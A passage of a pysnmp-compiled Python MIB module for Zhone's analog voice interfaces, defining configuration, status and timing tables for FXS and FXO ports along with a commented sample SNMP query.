Integer32, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, ModuleIdentity, Bits, Gauge32, Unsigned32, TimeTicks, IpAddress, ObjectIdentity, Counter64, Counter32, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "ModuleIdentity", "Bits", "Gauge32", "Unsigned32", "TimeTicks", "IpAddress", "ObjectIdentity", "Counter64", "Counter32", "iso")
TruthValue, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "DisplayString", "TextualConvention")
zhonePhysical, zhoneModules = mibBuilder.importSymbols("Zhone", "zhonePhysical", "zhoneModules")
ZhoneRowStatus, = mibBuilder.importSymbols("Zhone-TC", "ZhoneRowStatus")
zhoneVoiceAnalogIf_MIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5504, 6, 13)).setLabel("zhoneVoiceAnalogIf-MIB")
zhoneVoiceAnalogIf_MIB.setRevisions(('2009-05-05 02:36', '2008-03-26 17:45', '2007-11-01 02:30', '2005-09-06 11:14', '2005-08-08 15:00', '2005-05-11 15:20', '2005-05-02 17:22', '2004-10-07 11:34', '2001-10-10 11:19', '2001-02-15 18:52', '2000-09-12 14:21',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setRevisionsDescriptions(('V01.00.10 - Added new field if-cfg-loop-current in table analog-if-cfg-profile', 'Add ebs to zhoneValIfCfgLineType field.', 'V01.00.08 - Edited IfCfgImpedance field descriptions that ohmscomplex1 and ohmscomplex2 are Not Supported.', 'Deprecate zhonePotsRingTable. Move to zhoneVoiceRingTable in genVoiceStatMib.', 'Add zhonePotsRing table.', 'Changed zhoneVaIfCfgImpedance default value description from ohms900Complex to ohms600Complex.', 'Add default value descriptions for zhoneVAIfCfgImpedance, zhoneVAIffgReceivelp, zhoneVaIfCfgTransmitTlp.', 'zhoneVaIfEMCfgEntry change SignalType, CfgOperation and DialType from read-write to read-only', 'V01.00.02 - Removed Mark-Up for the zhoneVaIfFXSTimingDigitDuration and zhoneVaIfFXSTimingInterDigitDuration OIDs. Also added comment for the zhoneVaIfStatusSignalError OID.', 'V01.00.01 - Add DEFVAL for TruthValue types.', 'V01.00.00 - Initial Release',))
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setLastUpdated('200911171030Z')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setOrganization('Zhone Technologies, Inc.')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setContactInfo('Postal: Zhone Technologies, Inc. @Zhone Way 7001 Oakport Oakland, Ca 94621 Toll-Free 877-ZHONE20 (+1 877-946-6320) Tel: +1 510-777-7000 Fax: +1 510-777-7001 Email: support@zhone.com ')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setDescription("Analog Voice Interface MIB module. This MIB manages the E&M, FXO, FXS Interfaces in the Zhone's product. ")
zhoneVaIfObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6))
zhoneVaIfGeneralObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1))
zhoneVaIfCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1), )
if mibBuilder.loadTexts: zhoneVaIfCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTable.setDescription('The Analog Voice Standard Configuration Table. It contains the standard configuration information of the analog telephony interface. ')
zhoneVaIfCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgEntry.setDescription('An entry in the configuration table for each voice analog interface. The entry is created when the voice analog hardware is detected. ')
zhoneVaIfCfgImpedance = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("other", 1), ("ohms600Real", 2), ("ohms600Complex", 3), ("ohms900Complex", 4), ("ohmsComplex1", 5), ("ohmsComplex2", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgImpedance.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgImpedance.setDescription('Specifies the terminating impedance of voice analog interfaces. other - none of the following; arbitrary, within limits, for special cases. ohms600Real - 600 Ohms. ohms600Complex - 600 Ohms + 2.16uF ohms900Complex - 900 Ohms + 2.16uF. ohmsComplex1 - Not Supported. ohmsComplex2 - Not Supported. Default value is ohms600Complex. ')
zhoneVaIfCfgReceiveTLP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("fxsRtlpN9db", 1), ("fxsRtlpN8db", 2), ("fxsRtlpN7db", 3), ("fxsRtlpN6db", 4), ("fxsRtlpN5db", 5), ("fxsRtlpN4db", 6), ("fxsRtlpN3db", 7), ("fxsRtlpN2db", 8), ("fxsRtlpN1db", 9), ("fxsRtlp0db", 10), ("fxsRtlp1db", 11), ("fxsRtlp2db", 12), ("fxsRtlp3db", 13), ("rTlpNummeric", 14)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLP.setDescription(' Receive Transmission Level Point (RTLP) settings control the amount of gain or loss added to the incoming signal after it is decoded to analog. To increase the signal level, set the RTLP setting to higher values. The default is fxsRtlpN6db. Rtlpnummeric selects entering the actual value in zhoneVaIFCfgReceiveTLPNum.')
zhoneVaIfCfgTransmitTLP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("fxsTtlp9db", 1), ("fxsTtlp8db", 2), ("fxsTtlp7db", 3), ("fxsTtlp6db", 4), ("fxsTtlp5db", 5), ("fxsTtlp4db", 6), ("fxsTtlp3db", 7), ("fxsTtlp2db", 8), ("fxsTtlp1db", 9), ("fxsTtlp0db", 10), ("fxsTtlpN1db", 11), ("fxsTtlpN2db", 12), ("fxsTtlpN3db", 13), ("tTlpNummeric", 14)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLP.setDescription(' In case of FXO, it specifies FXO attenuation and default value is 0dB(fxsTtlp0db). In case of FXS this setting controls the amount of gain or loss added to a voice signal from CPE before it is encoded to digital PCM. To increase the signal level, reduce the TTLP setting to lower value. The default is fxsTtlp0db. Ttlpnummeric selects entering the actual value in zhoneVaIFCfgTransmitTLPNum.')
zhoneVaIfCfgTrunkConditioning = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("idle", 2), ("busy", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTrunkConditioning.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTrunkConditioning.setDescription(' The trunk conditioning setting specifies whether the FXS/FXO port should send the idle pattern to the network upon declaration of a Carrier Group Alarm(CGA) on the WAN link to which the port is assigned . In most cases leave the trunk conditioning setting at its default setting(off).')
zhoneVaIfCfgLineType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("fxs", 1), ("fxo", 2), ("em", 3), ("ebs", 4))).clone('fxs')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgLineType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLineType.setDescription('The card type: FXS, FXO, EM, EBS. Entries in the table will be created or deleted on the basis of zhoneVaIfCfgLineType in the zhoneVaIfCfgTable; no rowStatus entry is used for this. The tables which augment the above-mentioned table will be created by RP only and can be read or modified by the user later.')
zhoneVaIfCfgIntegratedDSP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 6), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgIntegratedDSP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgIntegratedDSP.setDescription('Indicates whether the interface has an integrated Digital Signal processing (DSP) unit. ')
zhoneVaIfCfgLineCapabilities = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 7), Bits().clone(namedValues=NamedValues(("fxs", 0), ("fxo", 1), ("em", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgLineCapabilities.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLineCapabilities.setDescription('The Interface types supported on this interface. This is a bit-map of possible types. This variable can be used to determine zhoneVaIfCfgLineType.')
zhoneVaIfCfgMaintenanceMode = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("ifDigitalLoopback", 2), ("ifAnalogLoopback", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgMaintenanceMode.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgMaintenanceMode.setDescription('Indicates the maintenance modes of the Analog voice interface. loopback options for Fxo and Fxs cards (Zhone specific) ------------------------------------------------------- CODEC T1/E1 DS0 --------------------------- <------- <--------------- ----------------- Network PCM Bus ^ Digital ^ | to analog Converter| | | | | | | Digital loopback Analog loopback | | -------> -------- ->---------------------------------------------> off(1) - the interface is not in maintenance mode. ifDigitalLoopback(2) This mode is set by the managed system to perform the Digital loopback test. ifAnalogLoopback(3) This mode is set by the managed system to perform the Analog loopback test. ')
zhoneVaIfCfgPCMEncoding = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("alaw", 1), ("mulaw", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgPCMEncoding.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgPCMEncoding.setDescription('alaw(1) :for E1 mulaw(2) : for T1 ')
zhoneVaIfCfgReceiveTLPNum = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-160, 85)).clone(0)).setUnits('dB/10').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLPNum.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLPNum.setDescription('Receive Transmission Level Point (RTLP) settings control the amount of gain or loss added to the incoming signal after it is decoded to analog. To increase the signal level, set the RTLP setting to higher values. The default is 0 dB.')
zhoneVaIfCfgTransmitTLPNum = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-175, 70))).setUnits('dB/10').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLPNum.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLPNum.setDescription('Transmit Transmission Level Point controls the amount of gain or loss added to a voice signal from CPE before it is encoded to digital PCM. To increase the signal level, reduce the TTLP setting to lower value. The default is 0dB.')
zhoneVaIfCfgLoopCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 44)).clone(30)).setUnits('mA').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgLoopCurrent.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLoopCurrent.setDescription('To set the loop current value for a subscriber')
zhoneVaIfCfgRingVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("b85vrms", 1), ("b75vrms", 2), ("b92vrms", 3))).clone('b85vrms')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgRingVoltage.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgRingVoltage.setDescription('To set the ring voltage for a subscriber.')
zhoneVaIfStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2), )
if mibBuilder.loadTexts: zhoneVaIfStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusTable.setDescription('The Analog Voice Status Table. It contains general information about the status of Analog Telephony interface including the error statistics. ')
zhoneVaIfStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1), )
zhoneVaIfCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfStatusEntry"))
zhoneVaIfStatusEntry.setIndexNames(*zhoneVaIfCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusEntry.setDescription('An entry in the status table for each Analog voice interface. ')
zhoneVaIfStatusSignalErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfStatusSignalErrors.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusSignalErrors.setDescription('Accumulated number of signaling protocol errors that are detected in the interface since system startup.')
zhoneVaIfStatusInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notype", 1), ("voice", 2), ("g3Fax", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfStatusInfoType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusInfoType.setDescription('The information transfer service for the current call. none - no information transfer service; this is set before the first call is made on the interface. voice - analog voice. g3Fax - Group 3 FAX. ')
zhoneVaIfFXSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2))
zhoneVaIfFXSCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1), )
if mibBuilder.loadTexts: zhoneVaIfFXSCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgTable.setDescription('The FXS standard configuration table. It contains FXS configuration parameters, one entry per FXS interface. The configuration information of this table is set by hardware with its default setting or CLI during the hardware installation time. ')
zhoneVaIfFXSCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfFXSCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgEntry.setDescription('An entry in the standard configuration table for each FXS interface.')
zhoneVaIfFXSCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16))).clone(namedValues=NamedValues(("fxsLoopStart", 1), ("fxsGroundStart", 2), ("fxsLoopStartFd", 3), ("fxsGroundStartAutomatic", 4), ("fxsGroundStartImmediate", 5), ("fxsdnLoopStart", 6), ("fxsdnLoopStartFd", 7), ("fxsdnGroundStart", 8), ("fxsdnGroundStartImmediate", 9), ("fxsdnwinkLoopStart", 10), ("fxsdnwinkLoopStartFd", 11), ("fxsdnwinkGroundStart", 12), ("fxsdnwinkGroundStartImmediate", 13), ("fxstr08SingleParty", 14), ("fxstr08UniversalVoiceGrade", 15), ("fxstr08UniversalVoiceGradeAutomatic", 16)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgSignalType.setDescription('The signaling type of the FXS interface. fxsLoopStart - loop start. fxsGroundStart - ground start. fxsLoopStartFd fxsGroundStartAutomatic - Used with equipment requiring fast response time to the Central Office. fxsGroundStartImmediate - Used with equipment requiring fast response time to the station or PBX. fxsdnLoopStart - loop start in fxsdn mode. fxsdnLoopStartFd fxsdnGroundStart - ground start in fxsdn mode. fxsdnGroundStartImmediate - ground start immediate in fxsdn mode. fxsdnwinkLoopStart - loop start in fxsdnwink (foreign exchange subscriber - defined wink start operation); this option provides the same type of signalling as FXSDN and adds a 150 millisecond delay then a 200 ms wink ack to the central office when the fxs port sees an off-hook condition from the central office. The system requires a ringing generator for this option. fxsdnwinkLoopStartFd fxsdnwinkGroundStart - ground start in FXSDNWINK mode. fxsdnwinkGroundStartImmediate - ground start immediate in FXSDNWINK mode. fxstr08SingleParty - TR08 is frame format signalling and data link as defined in TR-TSY-00008 Mode 1 for circuits using AT&T SLC-96 facilities; this option is for single party service and connects the port to one-way outgoing trunks from a PBX, CENTEREX, key system, or telephone set to an SLC channel. The SLC96 mode must also be active on the associated WAN interface. fxstr08UniversalVoiceGrade - toll quality voice for SLC-96. fxstr08UniversalVoiceGradeAutomatic - used with some non-Bell switches for SLC-96. The default value of this object is fxsLoopStart(1). ')
zhoneVaIfFXSRingFrequency = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ringFrequency25", 1), ("ringFrequency50", 2), ("ringFrequency20", 3), ("ringFrequency30", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSRingFrequency.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingFrequency.setDescription('the ring frequency to be used in the FXS interface. ringFrequency25 - ring frequency 25 Hertz. ringFrequency50 - ring frequency 50 Hertz. ringFrequency20 - ring frequency 20 Hertz.(Default) ringFrequency30 - ring frequency 30 Hertz. ')
zhoneVaIfFXSRingBack = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSRingBack.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingBack.setDescription('the ring back is requested if this variable is set to on.')
zhoneVaIfFXSStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2), )
if mibBuilder.loadTexts: zhoneVaIfFXSStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSStatusTable.setDescription('The Foreign Exchange Station (FXS) interface Status Table. It contains hook status, ring active and other states of the interface. ')
zhoneVaIfFXSStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1), )
zhoneVaIfFXSCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXSStatusEntry"))
zhoneVaIfFXSStatusEntry.setIndexNames(*zhoneVaIfFXSCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXSStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSStatusEntry.setDescription('An entry in the status table for each FXS interface. ')
zhoneVaIfFXSHookStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("onHook", 1), ("offHook", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSHookStatus.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSHookStatus.setDescription('This object contains the hook status of FXS interface. onHook - the connected equipment(e.g., phone) is onHook. offHook - the connected equipment is offHook. ')
zhoneVaIfFXSRingActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSRingActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingActive.setDescription("This object contains the outgoing ring active indication. If the object value is true, then the interface is currently generating ring out to the Key Telephone System (KTS) or Plain Old Telephone (POT); otherwise, it doesn't. ")
zhoneVaIfFXSRingGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 3), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSRingGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSRingGround.setDescription("This object contains the incoming ring ground indication. It is only valid when the zvaIfFXSCfgSignalType is fxsGroundStart. If the object is true, then the interface is presenting a ring ground to the connected equipment; otherwise, it doesn't. ")
zhoneVaIfFXSTipGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 2, 1, 4), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXSTipGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTipGround.setDescription("This object contains the incoming tip ground indication. It is only valid when the zvaIfFXSCfgSignalType is fxsGroundStart. If the object is true, then the interface is detecting a tip ground at the interface; otherwise, it doesn't. ")
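# Hedged query sketch (added for illustration; not part of the generated MIB):
# with this module compiled onto the pysnmp MIB search path, the FXS hook state
# defined above could be read via the high-level API. Host, community string
# and ifIndex below are placeholders.
#
#     from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
#                               ContextData, ObjectType, ObjectIdentity, getCmd)
#     errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
#         SnmpEngine(), CommunityData('public'),
#         UdpTransportTarget(('192.0.2.1', 161)), ContextData(),
#         ObjectType(ObjectIdentity('Zhone-VOICE-ANALOG-IF-MIB',
#                                   'zhoneVaIfFXSHookStatus', 1))))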
zhoneVaIfFXSTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3), )
if mibBuilder.loadTexts: zhoneVaIfFXSTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingTable.setDescription('The FXS interface Timing Parameters table. It contains the configuration of the various FXS signaling protocol timing parameters. ')
zhoneVaIfFXSTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1), )
zhoneVaIfFXSCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXSTimingEntry"))
zhoneVaIfFXSTimingEntry.setIndexNames(*zhoneVaIfFXSCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXSTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingEntry.setDescription('An entry in the FXS Timing Parameters Table for each FXS interface.')
zhoneVaIfFXSTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 milliseconds. This field is not supported. ')
zhoneVaIfFXSTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 milliseconds. This field is not supported. ')
zhonePotsRingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4), )
if mibBuilder.loadTexts: zhonePotsRingTable.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingTable.setDescription('Table to execute diagnostic potsring command. Row in table with non-zero timer will ring pots port. Currently, maximum of 4 rows at a time are supported.')
zhonePotsRingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1), ).setIndexNames((0, "Zhone-VOICE-ANALOG-IF-MIB", "zhonePotsRingIfIndex"))
if mibBuilder.loadTexts: zhonePotsRingEntry.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingEntry.setDescription('potsring table entry')
zhonePotsRingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: zhonePotsRingIfIndex.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingIfIndex.setDescription('Physical pots interface.')
zhonePotsRingRingingCadence = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("ring-cadence-r0", 1), ("ring-cadence-r1", 2), ("ring-cadence-r2", 3), ("ring-cadence-r3", 4), ("ring-cadence-r4", 5), ("ring-cadence-r5", 6), ("ring-cadence-r6", 7), ("ring-cadence-r7", 8), ("ring-cadence-common", 9), ("ring-cadence-splash", 10))).clone(9)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingRingingCadence.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingRingingCadence.setDescription('Ring cadence to use in test.')
zhonePotsRingTimer = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 9999)).clone(15)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingTimer.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingTimer.setDescription('Time in seconds to continue ringing.')
zhonePotsRingRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 4, 1, 4), ZhoneRowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: zhonePotsRingRowStatus.setStatus('deprecated')
if mibBuilder.loadTexts: zhonePotsRingRowStatus.setDescription('Row status')
zhoneVaIfFXOObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3))
zhoneVaIfFXOCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1), )
if mibBuilder.loadTexts: zhoneVaIfFXOCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgTable.setDescription('The FXO standard configuration table. It contains FXO configuration parameters, one entry per FXO interface. The configuration information of this table is set by hardware with its default setting or CLI during the hardware installation time. ')
zhoneVaIfFXOCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfFXOCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgEntry.setDescription('An entry in the standard configuration table for each FXO interface.')
zhoneVaIfFXOCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fxoLoopStart", 1), ("fxoGroundStart", 2), ("fxodpt", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSignalType.setDescription('The signaling type of the FXO interface. fxoLoopStart - loop start. fxoGroundStart - ground start. fxodpt - Dial Pulse Terminating; this option allows the unit to attach to incoming one-way trunks from a PBX, key system or a telephone set. The default value of this object is fxoLoopStart(1). ')
zhoneVaIfFXOCfgNumberRings = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgNumberRings.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgNumberRings.setDescription('The number of rings detected before closing loop. The default value of this object is 1 ring.')
